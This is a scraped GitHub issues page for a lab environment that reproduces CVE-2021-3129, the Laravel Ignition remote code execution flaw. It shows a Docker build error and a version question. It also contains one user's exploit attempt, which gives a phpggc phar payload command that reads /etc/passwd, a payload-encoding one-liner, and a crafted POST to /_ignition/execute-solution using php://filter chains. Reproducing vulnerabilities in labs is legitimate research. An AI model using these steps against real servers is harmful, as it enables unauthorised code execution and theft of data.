The cve-2021-3129's discuss from sncker

cve-2021-3129's Issues

Build error

How can I run it?

root@kali:/home/kali/Desktop/CVE-2021-3129# docker-compose up -d
Building with native build. Learn about native build in Compose here: https://docs.docker.com/go/compose-native-build/
Building laravel_debug_rce
Sending build context to Docker daemon  411.1kB

Step 1/6 : FROM php:7.3.25-alpine
 ---> 5b879b6b3734
Step 2/6 : COPY laravel /src
 ---> Using cache
 ---> e9eb2c7b53b0
Step 3/6 : WORKDIR /src
 ---> Using cache
 ---> d7eab59d127e
Step 4/6 : RUN cp .env.example .env     && php -r "copy('https://install.phpcomposer.com/installer', 'composer-setup.php');"    && php composer-setup.php       && php -r "unlink('composer-setup.php');"       && mv composer.phar /usr/local/bin/composer     && chmod +x /usr/local/bin/composer     && composer config -g repo.packagist composer https://mirrors.aliyun.com/composer/      && composer install     && composer require facade/ignition==2.5.1      && mv /usr/local/etc/php/php.ini-production /usr/local/etc/php/php.ini  && sed -i 's/;phar.readonly = On/phar.readonly = 0/g' /usr/local/etc/php/php.ini
 ---> Running in 68de553d9d16

Warning: copy(): php_network_getaddresses: getaddrinfo failed: Try again in Command line code on line 1

Warning: copy(https://install.phpcomposer.com/installer): failed to open stream: php_network_getaddresses: getaddrinfo failed: Try again in Command line code on line 1
Could not open input file: composer-setup.php
The command '/bin/sh -c cp .env.example .env    && php -r "copy('https://install.phpcomposer.com/installer', 'composer-setup.php');"    && php composer-setup.php       && php -r "unlink('composer-setup.php');"       && mv composer.phar /usr/local/bin/composer     && chmod +x /usr/local/bin/composer     && composer config -g repo.packagist composer https://mirrors.aliyun.com/composer/      && composer install     && composer require facade/ignition==2.5.1      && mv /usr/local/etc/php/php.ini-production /usr/local/etc/php/php.ini  && sed -i 's/;phar.readonly = On/phar.readonly = 0/g' /usr/local/etc/php/php.ini' returned a non-zero code: 1
ERROR: Service 'laravel_debug_rce' failed to build

安装好后版本是Laravel v8.44.0 (PHP v7.3.25)？

安装好后版本是Laravel v8.44.0 (PHP v7.3.25)？而且复现也失败了

Cannot exploit in the last step

Hi,

Thank you for your test environment. I tried to craft the payload by using

php -d "phar.readonly=0" ./phpggc monolog/rce1 system "cat /etc/passwd" --phar phar -o php://output | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())"

And I can decode back to phar file by using request as below

POST /_ignition/execute-solution HTTP/1.1
Host: <REDACT.COM>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 301

{
  "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  "parameters": {
    "variableName": "username",
    "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log	"		
  }
}

and when I check at /src/storage/logs/laravel.log , the decode request is work well.

but when I tried to exploit with phar insecure deserialization in the last step.

It said "SHA1 signature could not be verified: broken signature in file " and exploit unsuccess. Do you have any suggest to exploit correctly?

sncker / cve-2021-3129 Goto Github PK

cve-2021-3129's Issues

Build error

安装好后版本是Laravel v8.44.0 (PHP v7.3.25)？

Cannot exploit in the last step

草

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent